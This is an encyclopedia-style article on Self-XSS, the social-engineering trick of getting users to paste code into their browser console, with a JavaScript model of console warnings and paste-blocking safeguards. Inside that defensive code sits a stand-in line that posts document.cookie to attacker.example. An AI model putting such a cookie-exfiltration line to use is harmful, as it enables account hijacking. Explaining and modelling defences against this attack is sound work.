Self-XSS
Overview

Self-XSS works by tricking users into copying and pasting malicious content into their browser's web developer console. Typically the attacker posts a message claiming that, by copying and running a certain piece of code, the user will be able to hack another user's account. In fact, the code runs inside the victim's own logged-in session and allows the attacker to hijack the victim's account.[3]

History and mitigation

In the past a very similar attack was used, in which users were tricked into pasting malicious JavaScript into their browser's address bar. Browser vendors closed this off by stripping the javascript: scheme from text pasted into the address bar and by no longer running such URLs with the privileges of the currently loaded page,[4][5] after which attackers moved to Self-XSS in its current form. Web browser vendors and web sites have since taken steps to mitigate the attack. Mozilla Firefox[6] and Google Chrome[7] have both begun implementing safeguards that warn users before code is pasted into the console. Facebook, Google+ and others display a warning message when users open the web developer console, linking to pages that explain the attack in detail.[8][9]

Etymology

The "self" part of the name comes from the fact that the user is attacking themselves. The "XSS" part comes from the abbreviation for cross-site scripting, because both attacks result in malicious code running on a legitimate site. Beyond that the two have little in common: XSS is a vulnerability in the website itself (users cannot protect themselves against it, but the site operator can fix it by securing the site), whereas Self-XSS is a social engineering attack against the user (a careful user can protect themselves against it, but the site operator cannot prevent it, only warn against it).[10]

References

1. Sophos. "Social Networking Security Threats". n.d. http://www.sophos.com/en-us/security-news-trends/security-trends/social-networking-security-threats/facebook.aspx. Retrieved September 27, 2014.
2. "Bug 656433 – Disallow javascript: and data: URLs entered into the location bar from inheriting the principal of the currently-loaded page". Bugzilla, Mozilla Foundation. May 11, 2011. https://bugzilla.mozilla.org/show_bug.cgi?id=656433. Retrieved September 28, 2014.
3. "Issue 82181: [Linux] Strip javascript: schema from pastes/drops to omnibox". Google Code, Google. May 10, 2011. https://code.google.com/p/chromium/issues/detail?id=82181. Retrieved September 28, 2014.
4. "What do Self-XSS scams look like?". Facebook Help, Facebook. July 11, 2014. https://www.facebook.com/help/757846550903291. Retrieved September 27, 2014.
5. "What is Self-XSS?". Facebook Help, Facebook. July 15, 2014. https://www.facebook.com/help/246962205475854. Retrieved September 27, 2014.
6. "Bug 994134 – Warn first-time users on pasting code into the console". Bugzilla, Mozilla Foundation. April 9, 2014. https://bugzilla.mozilla.org/show_bug.cgi?id=994134. Retrieved September 28, 2014.
7. "Issue 345205: DevTools: Combat self-XSS". Google Code, Google. May 10, 2011. https://code.google.com/p/chromium/issues/detail?id=345205. Retrieved September 28, 2014.
8. Ilascu, Ionut. "Hackers Trick Facebook Users into Self Cross-Site Scripting (XSS) Scam". Softpedia, SoftNews NET SRL. July 28, 2014. http://news.softpedia.com/news/Hackers-Trick-Facebook-Users-Into-Self-Cross-Site-Scripting-XSS-Scam-452364.shtml. Retrieved September 27, 2014.
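The two kinds of safeguard described under "History and mitigation" above, as an added example that is not code from this article, Mozilla, Google or Facebook: a site-side console banner of the sort Facebook logs for anyone who opens DevTools, and a simplified model of the browser-side first-paste confirmation, written in JavaScript as plain functions so the behaviour can be exercised outside a browser. The site name, help URL, unlock phrase and message wording are assumptions made for this model, and the "pasted" snippet is a constructed stand-in that is only ever handled as a string, never executed.

```javascript
// Added example (not code from the article, Mozilla, Google or Facebook):
// a model of the two kinds of Self-XSS safeguard the article describes,
// written as plain functions so they can be exercised outside a browser.

// Constructed stand-in for the kind of snippet a lure asks the victim to
// paste. It is only ever handled as a string here and is never executed.
const PASTED_SAMPLE =
  "fetch('https://attacker.example/collect', { method: 'POST', body: document.cookie })";

// 1. Site-side safeguard (Facebook-style): a banner the page logs to its
//    own console so that anyone who opens DevTools sees it before pasting.
//    console.log treats each "%c" as a styling directive that consumes one
//    CSS string from the remaining arguments, hence format + styles.
function buildConsoleWarning(siteName, helpUrl) {
  const headline = 'color:red;font-size:48px;font-weight:bold';
  const body = 'font-size:16px';
  const format =
    '%cStop!%c\n' +
    'This is a browser feature intended for developers. If someone told you ' +
    'to copy and paste something here to enable a ' + siteName + ' feature or to ' +
    '"hack" someone\'s account, it is a scam and will give them access to your ' +
    siteName + ' account.\nSee ' + helpUrl + ' for more information.';
  return { format, styles: [headline, body] };
}

function printConsoleWarning(siteName, helpUrl) {
  const w = buildConsoleWarning(siteName, helpUrl);
  console.log(w.format, ...w.styles);
}

// 2. Browser-side safeguard, modelled on the first-paste confirmation in the
//    Firefox and Chrome DevTools consoles: typed input runs as usual, but
//    pasted input is refused until the user has typed an unlock phrase once.
//    (The phrase and the message wording are assumptions for this model.)
function createPasteGate(unlockPhrase = 'allow pasting') {
  let unlocked = false;
  return {
    // `pasted` is what the console knows from the paste event; a typed
    // command arrives with pasted=false.
    submit(text, { pasted = false } = {}) {
      if (text.trim() === unlockPhrase) {
        unlocked = true;
        return { action: 'unlocked', text };
      }
      if (pasted && !unlocked) {
        return {
          action: 'blocked',
          text,
          message:
            'Warning: Don\'t paste code into the DevTools Console that you ' +
            'don\'t understand or haven\'t reviewed yourself. This could allow ' +
            'attackers to steal your identity or take control of your computer. ' +
            'Type "' + unlockPhrase + '" below to allow pasting.',
        };
      }
      return { action: 'run', text };
    },
    isUnlocked() {
      return unlocked;
    },
  };
}

// Walk one console session through the gate and return the decisions, so
// the outcome can be inspected (or asserted on) rather than only printed.
function runDemo() {
  const gate = createPasteGate();
  const steps = [
    ['1 + 1', false],          // typed: runs
    [PASTED_SAMPLE, true],     // pasted before unlock: blocked
    ['allow pasting', false],  // user types the phrase
    [PASTED_SAMPLE, true],     // pasted after unlock: runs
  ];
  return steps.map(([text, pasted]) => gate.submit(text, { pasted }).action);
}

// Hypothetical site name and help URL.
printConsoleWarning('Example Social', 'https://example.com/help/self-xss');
console.log(runDemo()); // [ 'run', 'blocked', 'unlocked', 'run' ]
```

The gate models why the browser-side check is the more robust of the two: the site banner can only be read, and a determined victim following a lure can scroll past it, whereas the console refusing pasted input until the user has typed a phrase forces a deliberate action at the moment the attack happens. Neither safeguard changes what the pasted code could do once it runs, which is the point the etymology section makes about the site operator's limited options.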
Categories: Social engineering (computer security) | Web security exploits